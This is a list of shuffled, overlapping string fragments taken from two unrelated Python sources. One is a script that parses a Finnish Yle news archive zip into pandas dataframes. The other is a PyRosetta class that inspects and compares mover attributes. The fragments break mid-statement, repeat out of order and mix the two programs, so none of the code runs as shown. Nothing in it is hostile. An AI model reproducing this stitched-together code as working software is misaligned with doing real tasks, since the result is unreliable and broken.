"def fix_encoding(text): # MOT: <NAME>ikä\\r\\ntoimittaja <NAME>en\\r\\nensiläh. 24.1.2011 return ftfy.fix_text(text, uncurl_quotes=False) def clean_markdown(text): #",
"counter % 5 == 0: print(\"Parsed {x}/{y} files..\".format(x=counter, y=num_files)) print(\"Finished parsing.\") if __name__",
"**metadata, 'text': text } df = df.append(parsed_data, ignore_index=True) # Making output directory try:",
"\"__main__\": argparser = argparse.ArgumentParser( description='Yle news archive reader - parse archive data to",
"\", fname) continue with zip_.open(fname) as f: try: data = json.loads(f.read().decode(\"utf-8\")) except json.decoder.JSONDecodeError:",
"# Article content for paragraph in article[\"content\"]: # skip images etc. if paragraph[\"type\"]",
"# 'text' = ['resource', {'id': '6385775'}] if paragraph[\"type\"] == \"heading\" and isinstance(paragraph[\"text\"], list):",
"text = paragraph[\"text\"].strip() # slows down, but if there's no hurry then the",
"job started..\") for fname in fnames: counter += 1 df = pd.DataFrame( columns=['doc_id',",
"etc. if paragraph[\"type\"] not in [\"text\", \"heading\"]: text = \"N/A\" continue # 'text'",
"zip_.open(fname) as f: try: data = json.loads(f.read().decode(\"utf-8\")) except json.decoder.JSONDecodeError: print(\"Error reading file, skipping",
"output_fullpath = os.path.join(args.outputdir, fname) os.makedirs(os.path.dirname(output_fullpath), exist_ok=True) output_fullpath = os.path.splitext(output_fullpath)[0]+'.pkl' # pkl extension for",
"extension for df files except Exception as e: print(\"Error creating output path!\") print(e)",
"Pandas dataframes') argparser.add_argument('--zipfile', default=\"./data/ylenews-fi-2011-2018-src.zip\", help='zipfile downloaded from kielipankki') argparser.add_argument('--outputdir', default=\"./data/parsed/\", help='output directory for",
"if counter % 5 == 0: print(\"Parsed {x}/{y} files..\".format(x=counter, y=num_files)) print(\"Finished parsing.\") if",
"dataframes') argparser.add_argument('--zipfile', default=\"./data/ylenews-fi-2011-2018-src.zip\", help='zipfile downloaded from kielipankki') argparser.add_argument('--outputdir', default=\"./data/parsed/\", help='output directory for parsed",
"= { 'doc_id': counter, 'yle_id': article[\"id\"], 'url': article[\"url\"][\"full\"], 'published': article[\"datePublished\"] } # Article",
"list): text = \"N/A\" print(\"skipped paragraph element\", paragraph[\"text\"]) continue text = paragraph[\"text\"].strip() #",
"= os.path.splitext(output_fullpath)[0]+'.pkl' # pkl extension for df files except Exception as e: print(\"Error",
"os from markdown import markdown from bs4 import BeautifulSoup import ftfy import pandas",
"[Keskisuomalaisen](http://www.ksml.fi/kiekko/uutiset/sopanen-palaa-pelicansiin-jyp-ei-hankkinut-uusia-pelaajia/641867) mukaan JYP-hyökkääjä # kosketinsoittaja **Janne** toivoisi html = markdown(text) text = ''.join(BeautifulSoup(html,",
"article[\"datePublished\"] } # Article content for paragraph in article[\"content\"]: # skip images etc.",
"'6385775'}] if paragraph[\"type\"] == \"heading\" and isinstance(paragraph[\"text\"], list): text = \"N/A\" print(\"skipped paragraph",
"- parse archive data to Pandas dataframes') argparser.add_argument('--zipfile', default=\"./data/ylenews-fi-2011-2018-src.zip\", help='zipfile downloaded from kielipankki')",
"text } df = df.append(parsed_data, ignore_index=True) # Making output directory try: output_fullpath =",
"main(args): zip_ = zipfile.ZipFile(args.zipfile) fnames = zip_.namelist() num_files = len(fnames) counter = 0",
"'url', 'published', 'text']) # Reading json data if not fname.endswith(\".json\"): print(\"Skipping file \",",
"default=\"./data/ylenews-fi-2011-2018-src.zip\", help='zipfile downloaded from kielipankki') argparser.add_argument('--outputdir', default=\"./data/parsed/\", help='output directory for parsed dataframes') args",
"for paragraph in article[\"content\"]: # skip images etc. if paragraph[\"type\"] not in [\"text\",",
"df.append(parsed_data, ignore_index=True) # Making output directory try: output_fullpath = os.path.join(args.outputdir, fname) os.makedirs(os.path.dirname(output_fullpath), exist_ok=True)",
"= ['resource', {'id': '6385775'}] if paragraph[\"type\"] == \"heading\" and isinstance(paragraph[\"text\"], list): text =",
"article in data[\"data\"]: # Metadata metadata = { 'doc_id': counter, 'yle_id': article[\"id\"], 'url':",
"text = fix_encoding(text) text = clean_markdown(text) # Parsed data dictionary parsed_data = {",
"# Reading json data if not fname.endswith(\".json\"): print(\"Skipping file \", fname) continue with",
"__name__ == \"__main__\": argparser = argparse.ArgumentParser( description='Yle news archive reader - parse archive",
"the text will be cleaner text = fix_encoding(text) text = clean_markdown(text) # Parsed",
"description='Yle news archive reader - parse archive data to Pandas dataframes') argparser.add_argument('--zipfile', default=\"./data/ylenews-fi-2011-2018-src.zip\",",
"json.loads(f.read().decode(\"utf-8\")) except json.decoder.JSONDecodeError: print(\"Error reading file, skipping \", fname) for article in data[\"data\"]:",
"archive reader - parse archive data to Pandas dataframes') argparser.add_argument('--zipfile', default=\"./data/ylenews-fi-2011-2018-src.zip\", help='zipfile downloaded",
"= fix_encoding(text) text = clean_markdown(text) # Parsed data dictionary parsed_data = { **metadata,",
"df.to_pickle(output_fullpath) if counter % 5 == 0: print(\"Parsed {x}/{y} files..\".format(x=counter, y=num_files)) print(\"Finished parsing.\")",
"markdown from bs4 import BeautifulSoup import ftfy import pandas as pd def fix_encoding(text):",
"from markdown import markdown from bs4 import BeautifulSoup import ftfy import pandas as",
"print(\"Error reading file, skipping \", fname) for article in data[\"data\"]: # Metadata metadata",
"fnames = zip_.namelist() num_files = len(fnames) counter = 0 print(\"Parsing job started..\") for",
"for fname in fnames: counter += 1 df = pd.DataFrame( columns=['doc_id', 'yle_id', 'url',",
"pd.DataFrame( columns=['doc_id', 'yle_id', 'url', 'published', 'text']) # Reading json data if not fname.endswith(\".json\"):",
"'yle_id', 'url', 'published', 'text']) # Reading json data if not fname.endswith(\".json\"): print(\"Skipping file",
"zip_ = zipfile.ZipFile(args.zipfile) fnames = zip_.namelist() num_files = len(fnames) counter = 0 print(\"Parsing",
"BeautifulSoup import ftfy import pandas as pd def fix_encoding(text): # MOT: <NAME>ikä\\r\\ntoimittaja <NAME>en\\r\\nensiläh.",
"'text']) # Reading json data if not fname.endswith(\".json\"): print(\"Skipping file \", fname) continue",
"paragraph in article[\"content\"]: # skip images etc. if paragraph[\"type\"] not in [\"text\", \"heading\"]:",
"text will be cleaner text = fix_encoding(text) text = clean_markdown(text) # Parsed data",
"paragraph[\"text\"].strip() # slows down, but if there's no hurry then the text will",
"exist_ok=True) output_fullpath = os.path.splitext(output_fullpath)[0]+'.pkl' # pkl extension for df files except Exception as",
"{'id': '6385775'}] if paragraph[\"type\"] == \"heading\" and isinstance(paragraph[\"text\"], list): text = \"N/A\" print(\"skipped",
"= 0 print(\"Parsing job started..\") for fname in fnames: counter += 1 df",
"skipping \", fname) for article in data[\"data\"]: # Metadata metadata = { 'doc_id':",
"html = markdown(text) text = ''.join(BeautifulSoup(html, features=\"lxml\").findAll(text=True)) return text def main(args): zip_ =",
"print(\"Finished parsing.\") if __name__ == \"__main__\": argparser = argparse.ArgumentParser( description='Yle news archive reader",
"print(e) # Saving dataframe as pickle df.to_pickle(output_fullpath) if counter % 5 == 0:",
"if __name__ == \"__main__\": argparser = argparse.ArgumentParser( description='Yle news archive reader - parse",
"# Saving dataframe as pickle df.to_pickle(output_fullpath) if counter % 5 == 0: print(\"Parsed",
"def main(args): zip_ = zipfile.ZipFile(args.zipfile) fnames = zip_.namelist() num_files = len(fnames) counter =",
"article[\"id\"], 'url': article[\"url\"][\"full\"], 'published': article[\"datePublished\"] } # Article content for paragraph in article[\"content\"]:",
"Reading json data if not fname.endswith(\".json\"): print(\"Skipping file \", fname) continue with zip_.open(fname)",
"['resource', {'id': '6385775'}] if paragraph[\"type\"] == \"heading\" and isinstance(paragraph[\"text\"], list): text = \"N/A\"",
"'text': text } df = df.append(parsed_data, ignore_index=True) # Making output directory try: output_fullpath",
"argparser.add_argument('--zipfile', default=\"./data/ylenews-fi-2011-2018-src.zip\", help='zipfile downloaded from kielipankki') argparser.add_argument('--outputdir', default=\"./data/parsed/\", help='output directory for parsed dataframes')",
"will be cleaner text = fix_encoding(text) text = clean_markdown(text) # Parsed data dictionary",
"output path!\") print(e) # Saving dataframe as pickle df.to_pickle(output_fullpath) if counter % 5",
"continue # 'text' = ['resource', {'id': '6385775'}] if paragraph[\"type\"] == \"heading\" and isinstance(paragraph[\"text\"],",
"= { **metadata, 'text': text } df = df.append(parsed_data, ignore_index=True) # Making output",
"= argparse.ArgumentParser( description='Yle news archive reader - parse archive data to Pandas dataframes')",
"paragraph[\"type\"] not in [\"text\", \"heading\"]: text = \"N/A\" continue # 'text' = ['resource',",
"output_fullpath = os.path.splitext(output_fullpath)[0]+'.pkl' # pkl extension for df files except Exception as e:",
"Making output directory try: output_fullpath = os.path.join(args.outputdir, fname) os.makedirs(os.path.dirname(output_fullpath), exist_ok=True) output_fullpath = os.path.splitext(output_fullpath)[0]+'.pkl'",
"as e: print(\"Error creating output path!\") print(e) # Saving dataframe as pickle df.to_pickle(output_fullpath)",
"print(\"Parsing job started..\") for fname in fnames: counter += 1 df = pd.DataFrame(",
"fix_encoding(text) text = clean_markdown(text) # Parsed data dictionary parsed_data = { **metadata, 'text':",
"markdown import markdown from bs4 import BeautifulSoup import ftfy import pandas as pd",
"{ 'doc_id': counter, 'yle_id': article[\"id\"], 'url': article[\"url\"][\"full\"], 'published': article[\"datePublished\"] } # Article content",
"content for paragraph in article[\"content\"]: # skip images etc. if paragraph[\"type\"] not in",
"to Pandas dataframes') argparser.add_argument('--zipfile', default=\"./data/ylenews-fi-2011-2018-src.zip\", help='zipfile downloaded from kielipankki') argparser.add_argument('--outputdir', default=\"./data/parsed/\", help='output directory",
"for article in data[\"data\"]: # Metadata metadata = { 'doc_id': counter, 'yle_id': article[\"id\"],",
"paragraph[\"text\"]) continue text = paragraph[\"text\"].strip() # slows down, but if there's no hurry",
"return ftfy.fix_text(text, uncurl_quotes=False) def clean_markdown(text): # [Keskisuomalaisen](http://www.ksml.fi/kiekko/uutiset/sopanen-palaa-pelicansiin-jyp-ei-hankkinut-uusia-pelaajia/641867) mukaan JYP-hyökkääjä # kosketinsoittaja **Janne** toivoisi",
"def clean_markdown(text): # [Keskisuomalaisen](http://www.ksml.fi/kiekko/uutiset/sopanen-palaa-pelicansiin-jyp-ei-hankkinut-uusia-pelaajia/641867) mukaan JYP-hyökkääjä # kosketinsoittaja **Janne** toivoisi html = markdown(text)",
"# Metadata metadata = { 'doc_id': counter, 'yle_id': article[\"id\"], 'url': article[\"url\"][\"full\"], 'published': article[\"datePublished\"]",
"# Making output directory try: output_fullpath = os.path.join(args.outputdir, fname) os.makedirs(os.path.dirname(output_fullpath), exist_ok=True) output_fullpath =",
"fname) continue with zip_.open(fname) as f: try: data = json.loads(f.read().decode(\"utf-8\")) except json.decoder.JSONDecodeError: print(\"Error",
"continue with zip_.open(fname) as f: try: data = json.loads(f.read().decode(\"utf-8\")) except json.decoder.JSONDecodeError: print(\"Error reading",
"kosketinsoittaja **Janne** toivoisi html = markdown(text) text = ''.join(BeautifulSoup(html, features=\"lxml\").findAll(text=True)) return text def",
"fnames: counter += 1 df = pd.DataFrame( columns=['doc_id', 'yle_id', 'url', 'published', 'text']) #",
"print(\"Skipping file \", fname) continue with zip_.open(fname) as f: try: data = json.loads(f.read().decode(\"utf-8\"))",
"zipfile.ZipFile(args.zipfile) fnames = zip_.namelist() num_files = len(fnames) counter = 0 print(\"Parsing job started..\")",
"'text' = ['resource', {'id': '6385775'}] if paragraph[\"type\"] == \"heading\" and isinstance(paragraph[\"text\"], list): text",
"and isinstance(paragraph[\"text\"], list): text = \"N/A\" print(\"skipped paragraph element\", paragraph[\"text\"]) continue text =",
"text = clean_markdown(text) # Parsed data dictionary parsed_data = { **metadata, 'text': text",
"f: try: data = json.loads(f.read().decode(\"utf-8\")) except json.decoder.JSONDecodeError: print(\"Error reading file, skipping \", fname)",
"Parsed data dictionary parsed_data = { **metadata, 'text': text } df = df.append(parsed_data,",
"import zipfile import argparse import sys import json import re import os from",
"{ **metadata, 'text': text } df = df.append(parsed_data, ignore_index=True) # Making output directory",
"} df = df.append(parsed_data, ignore_index=True) # Making output directory try: output_fullpath = os.path.join(args.outputdir,",
"try: output_fullpath = os.path.join(args.outputdir, fname) os.makedirs(os.path.dirname(output_fullpath), exist_ok=True) output_fullpath = os.path.splitext(output_fullpath)[0]+'.pkl' # pkl extension",
"path!\") print(e) # Saving dataframe as pickle df.to_pickle(output_fullpath) if counter % 5 ==",
"fix_encoding(text): # MOT: <NAME>ikä\\r\\ntoimittaja <NAME>en\\r\\nensiläh. 24.1.2011 return ftfy.fix_text(text, uncurl_quotes=False) def clean_markdown(text): # [Keskisuomalaisen](http://www.ksml.fi/kiekko/uutiset/sopanen-palaa-pelicansiin-jyp-ei-hankkinut-uusia-pelaajia/641867)",
"{x}/{y} files..\".format(x=counter, y=num_files)) print(\"Finished parsing.\") if __name__ == \"__main__\": argparser = argparse.ArgumentParser( description='Yle",
"pd def fix_encoding(text): # MOT: <NAME>ikä\\r\\ntoimittaja <NAME>en\\r\\nensiläh. 24.1.2011 return ftfy.fix_text(text, uncurl_quotes=False) def clean_markdown(text):",
"== \"__main__\": argparser = argparse.ArgumentParser( description='Yle news archive reader - parse archive data",
"argparser = argparse.ArgumentParser( description='Yle news archive reader - parse archive data to Pandas",
"= ''.join(BeautifulSoup(html, features=\"lxml\").findAll(text=True)) return text def main(args): zip_ = zipfile.ZipFile(args.zipfile) fnames = zip_.namelist()",
"there's no hurry then the text will be cleaner text = fix_encoding(text) text",
"except Exception as e: print(\"Error creating output path!\") print(e) # Saving dataframe as",
"''.join(BeautifulSoup(html, features=\"lxml\").findAll(text=True)) return text def main(args): zip_ = zipfile.ZipFile(args.zipfile) fnames = zip_.namelist() num_files",
"'doc_id': counter, 'yle_id': article[\"id\"], 'url': article[\"url\"][\"full\"], 'published': article[\"datePublished\"] } # Article content for",
"hurry then the text will be cleaner text = fix_encoding(text) text = clean_markdown(text)",
"directory try: output_fullpath = os.path.join(args.outputdir, fname) os.makedirs(os.path.dirname(output_fullpath), exist_ok=True) output_fullpath = os.path.splitext(output_fullpath)[0]+'.pkl' # pkl",
"try: data = json.loads(f.read().decode(\"utf-8\")) except json.decoder.JSONDecodeError: print(\"Error reading file, skipping \", fname) for",
"<NAME>ikä\\r\\ntoimittaja <NAME>en\\r\\nensiläh. 24.1.2011 return ftfy.fix_text(text, uncurl_quotes=False) def clean_markdown(text): # [Keskisuomalaisen](http://www.ksml.fi/kiekko/uutiset/sopanen-palaa-pelicansiin-jyp-ei-hankkinut-uusia-pelaajia/641867) mukaan JYP-hyökkääjä #",
"files except Exception as e: print(\"Error creating output path!\") print(e) # Saving dataframe",
"df = df.append(parsed_data, ignore_index=True) # Making output directory try: output_fullpath = os.path.join(args.outputdir, fname)",
"= paragraph[\"text\"].strip() # slows down, but if there's no hurry then the text",
"= zip_.namelist() num_files = len(fnames) counter = 0 print(\"Parsing job started..\") for fname",
"if paragraph[\"type\"] not in [\"text\", \"heading\"]: text = \"N/A\" continue # 'text' =",
"dictionary parsed_data = { **metadata, 'text': text } df = df.append(parsed_data, ignore_index=True) #",
"os.path.splitext(output_fullpath)[0]+'.pkl' # pkl extension for df files except Exception as e: print(\"Error creating",
"num_files = len(fnames) counter = 0 print(\"Parsing job started..\") for fname in fnames:",
"Article content for paragraph in article[\"content\"]: # skip images etc. if paragraph[\"type\"] not",
"# slows down, but if there's no hurry then the text will be",
"output directory try: output_fullpath = os.path.join(args.outputdir, fname) os.makedirs(os.path.dirname(output_fullpath), exist_ok=True) output_fullpath = os.path.splitext(output_fullpath)[0]+'.pkl' #",
"# MOT: <NAME>ikä\\r\\ntoimittaja <NAME>en\\r\\nensiläh. 24.1.2011 return ftfy.fix_text(text, uncurl_quotes=False) def clean_markdown(text): # [Keskisuomalaisen](http://www.ksml.fi/kiekko/uutiset/sopanen-palaa-pelicansiin-jyp-ei-hankkinut-uusia-pelaajia/641867) mukaan",
"5 == 0: print(\"Parsed {x}/{y} files..\".format(x=counter, y=num_files)) print(\"Finished parsing.\") if __name__ == \"__main__\":",
"reader - parse archive data to Pandas dataframes') argparser.add_argument('--zipfile', default=\"./data/ylenews-fi-2011-2018-src.zip\", help='zipfile downloaded from",
"import ftfy import pandas as pd def fix_encoding(text): # MOT: <NAME>ikä\\r\\ntoimittaja <NAME>en\\r\\nensiläh. 24.1.2011",
"article[\"content\"]: # skip images etc. if paragraph[\"type\"] not in [\"text\", \"heading\"]: text =",
"data dictionary parsed_data = { **metadata, 'text': text } df = df.append(parsed_data, ignore_index=True)",
"Metadata metadata = { 'doc_id': counter, 'yle_id': article[\"id\"], 'url': article[\"url\"][\"full\"], 'published': article[\"datePublished\"] }",
"**Janne** toivoisi html = markdown(text) text = ''.join(BeautifulSoup(html, features=\"lxml\").findAll(text=True)) return text def main(args):",
"isinstance(paragraph[\"text\"], list): text = \"N/A\" print(\"skipped paragraph element\", paragraph[\"text\"]) continue text = paragraph[\"text\"].strip()",
"24.1.2011 return ftfy.fix_text(text, uncurl_quotes=False) def clean_markdown(text): # [Keskisuomalaisen](http://www.ksml.fi/kiekko/uutiset/sopanen-palaa-pelicansiin-jyp-ei-hankkinut-uusia-pelaajia/641867) mukaan JYP-hyökkääjä # kosketinsoittaja **Janne**",
"skip images etc. if paragraph[\"type\"] not in [\"text\", \"heading\"]: text = \"N/A\" continue",
"0 print(\"Parsing job started..\") for fname in fnames: counter += 1 df =",
"text def main(args): zip_ = zipfile.ZipFile(args.zipfile) fnames = zip_.namelist() num_files = len(fnames) counter",
"import markdown from bs4 import BeautifulSoup import ftfy import pandas as pd def",
"ftfy import pandas as pd def fix_encoding(text): # MOT: <NAME>ikä\\r\\ntoimittaja <NAME>en\\r\\nensiläh. 24.1.2011 return",
"= json.loads(f.read().decode(\"utf-8\")) except json.decoder.JSONDecodeError: print(\"Error reading file, skipping \", fname) for article in",
"[\"text\", \"heading\"]: text = \"N/A\" continue # 'text' = ['resource', {'id': '6385775'}] if",
"paragraph element\", paragraph[\"text\"]) continue text = paragraph[\"text\"].strip() # slows down, but if there's",
"import BeautifulSoup import ftfy import pandas as pd def fix_encoding(text): # MOT: <NAME>ikä\\r\\ntoimittaja",
"started..\") for fname in fnames: counter += 1 df = pd.DataFrame( columns=['doc_id', 'yle_id',",
"Saving dataframe as pickle df.to_pickle(output_fullpath) if counter % 5 == 0: print(\"Parsed {x}/{y}",
"images etc. if paragraph[\"type\"] not in [\"text\", \"heading\"]: text = \"N/A\" continue #",
"no hurry then the text will be cleaner text = fix_encoding(text) text =",
"be cleaner text = fix_encoding(text) text = clean_markdown(text) # Parsed data dictionary parsed_data",
"parsed_data = { **metadata, 'text': text } df = df.append(parsed_data, ignore_index=True) # Making",
"MOT: <NAME>ikä\\r\\ntoimittaja <NAME>en\\r\\nensiläh. 24.1.2011 return ftfy.fix_text(text, uncurl_quotes=False) def clean_markdown(text): # [Keskisuomalaisen](http://www.ksml.fi/kiekko/uutiset/sopanen-palaa-pelicansiin-jyp-ei-hankkinut-uusia-pelaajia/641867) mukaan JYP-hyökkääjä",
"import json import re import os from markdown import markdown from bs4 import",
"'yle_id': article[\"id\"], 'url': article[\"url\"][\"full\"], 'published': article[\"datePublished\"] } # Article content for paragraph in",
"print(\"Parsed {x}/{y} files..\".format(x=counter, y=num_files)) print(\"Finished parsing.\") if __name__ == \"__main__\": argparser = argparse.ArgumentParser(",
"then the text will be cleaner text = fix_encoding(text) text = clean_markdown(text) #",
"data = json.loads(f.read().decode(\"utf-8\")) except json.decoder.JSONDecodeError: print(\"Error reading file, skipping \", fname) for article",
"element\", paragraph[\"text\"]) continue text = paragraph[\"text\"].strip() # slows down, but if there's no",
"text = ''.join(BeautifulSoup(html, features=\"lxml\").findAll(text=True)) return text def main(args): zip_ = zipfile.ZipFile(args.zipfile) fnames =",
"counter, 'yle_id': article[\"id\"], 'url': article[\"url\"][\"full\"], 'published': article[\"datePublished\"] } # Article content for paragraph",
"mukaan JYP-hyökkääjä # kosketinsoittaja **Janne** toivoisi html = markdown(text) text = ''.join(BeautifulSoup(html, features=\"lxml\").findAll(text=True))",
"\"heading\" and isinstance(paragraph[\"text\"], list): text = \"N/A\" print(\"skipped paragraph element\", paragraph[\"text\"]) continue text",
"zipfile import argparse import sys import json import re import os from markdown"
] |
[
"iterable = dir(self.target) for methodname in iterable: print(f'## {methodname}') method = getattr(self.target, methodname)",
"= True) -> Dict[str, Any]: \"\"\" Calls without arguments the methods. If ``iterable``",
"mover called in script! >>> AttributeDocumentarian(pm).compare(evo) # -> pd.DataFrame --------------------------- Attributes: * target:",
"citation Methods: * describe(): describe attributes * test(): calls the methods * compare():",
"-> Set[str]: \"\"\" The set of attributes that are absent in the parent",
"pyrosetta import pandas as pd from typing import Tuple, List, Dict, Set, Any,",
"print only those. \"\"\" if iterable is None: iterable = dir(self.target) for methodname",
"Describe attributes by calling help. If ``iterable`` is provided, it will print only",
"dir(self.target) for methodname in iterable: print(f'## {methodname}') method = getattr(self.target, methodname) help(method) def",
"though! :rtype: Set[str] \"\"\" if len(self.base) > 1: return set(dir(self.base[0])) - set(dir(self.base[1])) def",
"compare(self, reference: Optional[pyrosetta.rosetta.protocols.moves.Mover] = None) -> pd.DataFrame: \"\"\" Tests the methods (see ``test()``",
"methodname) try: result = method() results[methodname] = result if silent is False: print(f'Calling",
"determines what is different from default. For example. Give a working XML script:",
"if provided. \"\"\" c = self.test_uninherited() if reference is None: reference = self.target_cls()",
"AttributeDocumentarian(pm).compare(evo) # -> pd.DataFrame --------------------------- Attributes: * target: instance * target_cls: class *",
"blank instance \"\"\" @property def uninherited(self) -> Set[str]: \"\"\" The set of attributes",
"\"\"\" Analyses a Pyrosetta object and determines what is different from default. For",
"only those. \"\"\" if iterable is None: iterable = dir(self.target) for methodname in",
"= dir(self.target) results = {} for methodname in iterable: method = getattr(self.target, methodname)",
"instance \"\"\" @property def uninherited(self) -> Set[str]: \"\"\" The set of attributes that",
"Calls without arguments the methods that where not inherited. \"\"\" return self.test(self.uninherited, silent)",
"methodname in iterable: method = getattr(self.target, methodname) try: result = method() results[methodname] =",
"* uninherited: The set of attributes that are absent in the parent class",
"[{'attribute': k, 'target': ref[k], 'reference': case[k], 'equal': str(ref[k]) == str(case[k])} for k in",
"attributes that are absent in the parent class * citation: string of citation",
"or to ``reference`` if provided. \"\"\" c = self.test() if reference is None:",
"* test(): calls the methods * compare(): compares the results of a ``test()``",
"``test()`` and compares them to a generic instance or to ``reference`` if provided.",
">>> print(pm.mover_name()) # mover called in script! >>> AttributeDocumentarian(pm).compare(evo) # -> pd.DataFrame ---------------------------",
"compare_uninherited(self, reference: Optional[pyrosetta.rosetta.protocols.moves.Mover] = None) -> pd.DataFrame: \"\"\" Tests the uninherited methods (see",
"the results of a ``test()`` to that of a blank instance \"\"\" @property",
"TypeError as error: results[methodname] = 'N/A' if silent is False: print(f'Calling failed for",
"import Tuple, List, Dict, Set, Any, Optional, Sequence from .base import BaseDocumentarian class",
"results def test_uninherited(self, silent: bool = True) -> dict: \"\"\" Calls without arguments",
"= True) -> dict: \"\"\" Calls without arguments the methods that where not",
"method = getattr(self.target, methodname) help(method) def test(self, iterable: Optional[Sequence[str]] = None, silent: bool",
"overwritten though! :rtype: Set[str] \"\"\" if len(self.base) > 1: return set(dir(self.base[0])) - set(dir(self.base[1]))",
"to a generic instance or to ``reference`` if provided. \"\"\" c = self.test_uninherited()",
"idea if other were overwritten though! :rtype: Set[str] \"\"\" if len(self.base) > 1:",
"can reverse engineer it, thusly: >>> pm = protocol.get_mover(1) >>> print(pm.mover_name()) # mover",
"if other were overwritten though! :rtype: Set[str] \"\"\" if len(self.base) > 1: return",
"if iterable is None: iterable = dir(self.target) results = {} for methodname in",
"= getattr(self.target, methodname) help(method) def test(self, iterable: Optional[Sequence[str]] = None, silent: bool =",
"getattr(self.target, methodname) try: result = method() results[methodname] = result if silent is False:",
"iterable: Optional[Sequence[str]] = None) -> None: \"\"\" Describe attributes by calling help. If",
"reference: Optional[pyrosetta.rosetta.protocols.moves.Mover] = None) -> pd.DataFrame: \"\"\" Tests the uninherited methods (see ``test()``",
".base import BaseDocumentarian class AttributeDocumentarian(BaseDocumentarian): \"\"\" Analyses a Pyrosetta object and determines what",
"error: results[methodname] = 'N/A' if silent is False: print(f'Calling failed for {methodname}: {result}')",
"instance or to ``reference`` if provided. \"\"\" c = self.test() if reference is",
"-> pd.DataFrame: \"\"\" Tests the uninherited methods (see ``test()`` and compares them to",
"True) -> dict: \"\"\" Calls without arguments the methods that where not inherited.",
"protocol.get_mover(1) >>> print(pm.mover_name()) # mover called in script! >>> AttributeDocumentarian(pm).compare(evo) # -> pd.DataFrame",
"silent) def compare(self, reference: Optional[pyrosetta.rosetta.protocols.moves.Mover] = None) -> pd.DataFrame: \"\"\" Tests the methods",
"set of attributes that are absent in the parent class. Has no idea",
"script: >>> xml_obj = pyrosetta.rosetta.protocols.rosetta_scripts.RosettaScriptsParser() >>> protocol = xml_obj.generate_mover_and_apply_to_pose(pose, 'script.xml') >>> protocol.apply(pose) One",
"Optional[pyrosetta.rosetta.protocols.moves.Mover] = None) -> pd.DataFrame: \"\"\" Tests the methods (see ``test()`` and compares",
"results of a ``test()`` to that of a blank instance \"\"\" @property def",
"pd from typing import Tuple, List, Dict, Set, Any, Optional, Sequence from .base",
"test(self, iterable: Optional[Sequence[str]] = None, silent: bool = True) -> Dict[str, Any]: \"\"\"",
"protocol.apply(pose) One can reverse engineer it, thusly: >>> pm = protocol.get_mover(1) >>> print(pm.mover_name())",
"{methodname}: {result}') except TypeError as error: results[methodname] = 'N/A' if silent is False:",
"that are absent in the parent class. Has no idea if other were",
"= self.test_uninherited() if reference is None: reference = self.target_cls() refexplorer = self.__class__(reference) r",
"a Pyrosetta object and determines what is different from default. For example. Give",
">>> pm = protocol.get_mover(1) >>> print(pm.mover_name()) # mover called in script! >>> AttributeDocumentarian(pm).compare(evo)",
"-> Dict[str, Any]: \"\"\" Calls without arguments the methods. If ``iterable`` is provided,",
"True) -> Dict[str, Any]: \"\"\" Calls without arguments the methods. If ``iterable`` is",
"example. Give a working XML script: >>> xml_obj = pyrosetta.rosetta.protocols.rosetta_scripts.RosettaScriptsParser() >>> protocol =",
"typing import Tuple, List, Dict, Set, Any, Optional, Sequence from .base import BaseDocumentarian",
">>> AttributeDocumentarian(pm).compare(evo) # -> pd.DataFrame --------------------------- Attributes: * target: instance * target_cls: class",
"-> pd.DataFrame: assert case, f'make_table cannot make a table without data (case={case}, ref={ref})'",
"citation: string of citation Methods: * describe(): describe attributes * test(): calls the",
"Pyrosetta object and determines what is different from default. For example. Give a",
"\"\"\" Calls without arguments the methods. If ``iterable`` is provided, it will call",
"from .base import BaseDocumentarian class AttributeDocumentarian(BaseDocumentarian): \"\"\" Analyses a Pyrosetta object and determines",
"= None, silent: bool = True) -> Dict[str, Any]: \"\"\" Calls without arguments",
"methods. If ``iterable`` is provided, it will call only those. Returns a dictionary",
"is provided, it will print only those. \"\"\" if iterable is None: iterable",
"pd.DataFrame --------------------------- Attributes: * target: instance * target_cls: class * base: The tuple",
"Set, Any, Optional, Sequence from .base import BaseDocumentarian class AttributeDocumentarian(BaseDocumentarian): \"\"\" Analyses a",
"None) -> pd.DataFrame: \"\"\" Tests the methods (see ``test()`` and compares them to",
"pyrosetta.rosetta.protocols.rosetta_scripts.RosettaScriptsParser() >>> protocol = xml_obj.generate_mover_and_apply_to_pose(pose, 'script.xml') >>> protocol.apply(pose) One can reverse engineer it,",
"print(pm.mover_name()) # mover called in script! >>> AttributeDocumentarian(pm).compare(evo) # -> pd.DataFrame --------------------------- Attributes:",
"* target_cls: class * base: The tuple of classes inherited (``__mro__``) * uninherited:",
"return self._make_table(c, r) def compare_uninherited(self, reference: Optional[pyrosetta.rosetta.protocols.moves.Mover] = None) -> pd.DataFrame: \"\"\" Tests",
"Any]) -> pd.DataFrame: assert case, f'make_table cannot make a table without data (case={case},",
"refexplorer = self.__class__(reference) r = refexplorer.test_uninherited() return self._make_table(c, r) def _make_table(self, case: Dict[str,",
"Dict[str, Any], ref: Dict[str, Any]) -> pd.DataFrame: assert case, f'make_table cannot make a",
"= pyrosetta.rosetta.protocols.rosetta_scripts.RosettaScriptsParser() >>> protocol = xml_obj.generate_mover_and_apply_to_pose(pose, 'script.xml') >>> protocol.apply(pose) One can reverse engineer",
"Methods: * describe(): describe attributes * test(): calls the methods * compare(): compares",
"r = refexplorer.test() return self._make_table(c, r) def compare_uninherited(self, reference: Optional[pyrosetta.rosetta.protocols.moves.Mover] = None) ->",
"is provided, it will call only those. Returns a dictionary of the results.",
"instance or to ``reference`` if provided. \"\"\" c = self.test_uninherited() if reference is",
"reference is None: reference = self.target_cls() refexplorer = self.__class__(reference) r = refexplorer.test_uninherited() return",
"= refexplorer.test_uninherited() return self._make_table(c, r) def _make_table(self, case: Dict[str, Any], ref: Dict[str, Any])",
"case[k], 'equal': str(ref[k]) == str(case[k])} for k in case.keys()] comparison = pd.DataFrame(proto) return",
"silent is False: print(f'Calling worked for {methodname}: {result}') except TypeError as error: results[methodname]",
"thusly: >>> pm = protocol.get_mover(1) >>> print(pm.mover_name()) # mover called in script! >>>",
"protocol = xml_obj.generate_mover_and_apply_to_pose(pose, 'script.xml') >>> protocol.apply(pose) One can reverse engineer it, thusly: >>>",
"= [{'attribute': k, 'target': ref[k], 'reference': case[k], 'equal': str(ref[k]) == str(case[k])} for k",
"method = getattr(self.target, methodname) try: result = method() results[methodname] = result if silent",
"One can reverse engineer it, thusly: >>> pm = protocol.get_mover(1) >>> print(pm.mover_name()) #",
"of the results. \"\"\" if iterable is None: iterable = dir(self.target) results =",
"'equal': str(ref[k]) == str(case[k])} for k in case.keys()] comparison = pd.DataFrame(proto) return comparison.set_index(['attribute'])",
